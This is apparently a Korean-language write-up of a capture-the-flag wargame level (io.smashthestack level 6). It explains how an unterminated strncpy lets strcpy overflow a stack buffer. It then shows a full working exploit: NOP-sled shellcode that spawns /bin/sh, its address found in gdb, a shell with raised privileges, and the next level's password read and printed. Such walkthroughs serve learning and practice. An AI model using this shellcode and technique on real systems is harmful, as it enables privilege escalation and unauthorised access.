io.smashthestack.org – Level 6

Level 6 문제 소스는 아래와 같다.

#include<string.h>

// The devil is in the details - nnp

void copy_buffers(char *argv[])
{
    char buf1[32], buf2[32], buf3[32];

    strncpy(buf2, argv[1], 31);
    strncpy(buf3, argv[2], sizeof(buf3));
    strcpy(buf1, buf3);
}

int main(int argc, char *argv[])
{
    copy_buffers(argv); 
    return 0;
}

특별히 오버플로우가 날거 같은 부분이 보이지 않는다. 하지만 아래와 같이 입력을 하면 세그먼트폴트가 발생한다.

level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*31"`        
level6@io:/tmp/by6$ /levels/level06 `python -c "print 'A'*10 + ' ' + 'B'*32"` 
Segmentation fault
level6@io:/tmp/by6$ 

어떻게 오버플로우가 발생하는지 아래와 같이 코드를 수정하여 확인해 보도록 하자.

#include<string.h>

// The devil is in the details - nnp

void copy_buffers(char *argv[])
{
  char buf1[32], buf2[32], buf3[32];

  strncpy(buf2, argv[1], 31);
  printf("%s\n", buf2);
  strncpy(buf3, argv[2], sizeof(buf3));
  printf("%s\n", buf3);
  strcpy(buf1, buf3);
  printf("%s\n", buf1);
}

int main(int argc, char *argv[])
{
  copy_buffers(argv); 
  return 0;
}

level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*31"`         
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
level6@io:/tmp/by6$ ./a.out `python -c "print 'A'*10 + ' ' + 'B'*32"` 
AAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAA
Segmentation fault
level6@io:/tmp/by6$ 

buf3의 변수에 값을 입력하는 과정에서 오버플로우가 나 buf2의 값이 같이 입력되는걸 볼 수 있었다.
그럼 이제 buf2에는 우리가 원하는 주소를 넣고 buf3를 오버 플로우 시키면 될 것으로 보인다. 공격을 해보자.

level6@io:/tmp/by6$ export SHELLCODE=`python -c "print '\x90'*100 + '\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80'"`
level6@io:/tmp/by6$ gdb /levels/level06
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb) b main
Breakpoint 1 at 0x80483fa
(gdb) r
Starting program: /levels/level06 

Breakpoint 1, 0x080483fa in main ()
(gdb) x/32wx $esp
0xbfffdca4:     0xbfffdcc0      0xbfffdd18      0x0094f455      0x08048470
0xbfffdcb4:     0x080482f0      0xbfffdd18      0x0094f455      0x00000001
0xbfffdcc4:     0xbfffdd44      0xbfffdd4c      0x0052db18      0x00000001
0xbfffdcd4:     0x00000001      0x00000000      0x0804820c      0x00a72ff4
0xbfffdce4:     0x08048470      0x080482f0      0xbfffdd18      0xebb98081
0xbfffdcf4:     0x3de835ff      0x00000000      0x00000000      0x00000000
0xbfffdd04:     0x0069f2e0      0x0094f37d      0x006a6ff4      0x00000001
0xbfffdd14:     0x080482f0      0x00000000      0x08048311      0x080483ec
(gdb) 
0xbfffdd24:     0x00000001      0xbfffdd44      0x08048470      0x08048420
0xbfffdd34:     0x0069a250      0xbfffdd3c      0x006a4ae5      0x00000001
0xbfffdd44:     0xbfffde22      0x00000000      0xbfffde32      0xbfffdebf
0xbfffdd54:     0xbfffdecf      0xbfffdeda      0xbfffdefc      0xbfffdf10
0xbfffdd64:     0xbfffdf1c      0xbfffdf28      0xbfffdf55      0xbfffdf6b
0xbfffdd74:     0xbfffdf7a      0xbfffdf87      0xbfffdf90      0xbfffdfa2
0xbfffdd84:     0xbfffdfaa      0xbfffdfb9      0x00000000      0x00000010
0xbfffdd94:     0xbfebfbff      0x00000006      0x00001000      0x00000011
(gdb) 
0xbfffdda4:     0x00000064      0x00000003      0x08048034      0x00000004
0xbfffddb4:     0x00000020      0x00000005      0x00000007      0x00000007
0xbfffddc4:     0x0068c000      0x00000008      0x00000000      0x00000009
0xbfffddd4:     0x080482f0      0x0000000b      0x000003ee      0x0000000c
0xbfffdde4:     0x000003ee      0x0000000d      0x000003ee      0x0000000e
0xbfffddf4:     0x000003ee      0x00000017      0x00000000      0x0000000f
0xbfffde04:     0xbfffde1b      0x00000000      0x00000000      0x00000000
0xbfffde14:     0x00000000      0x69000000      0x00363836      0x6c2f0000
(gdb) 
0xbfffde24:     0x6c657665      0x656c2f73      0x306c6576      0x48530036
0xbfffde34:     0x434c4c45      0x3d45444f      0x90909090      0x90909090
0xbfffde44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde84:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffde94:     0x90909090      0x90909090      0x90909090      0x3158176a
(gdb) q
The program is running.  Exit anyway? (y or n) y
level6@io:/tmp/by6$ /levels/level06 `python -c "print '\x94\xde\xff\xbf'*2 + ' ' + 'B'*32"`                 
sh-3.2$ id
uid=1006(level6) gid=1006(level6) euid=1007(level7) groups=1006(level6),1029(nosu)
sh-3.2$ cat /home/level7/.pass
qpapbi2w
sh-3.2$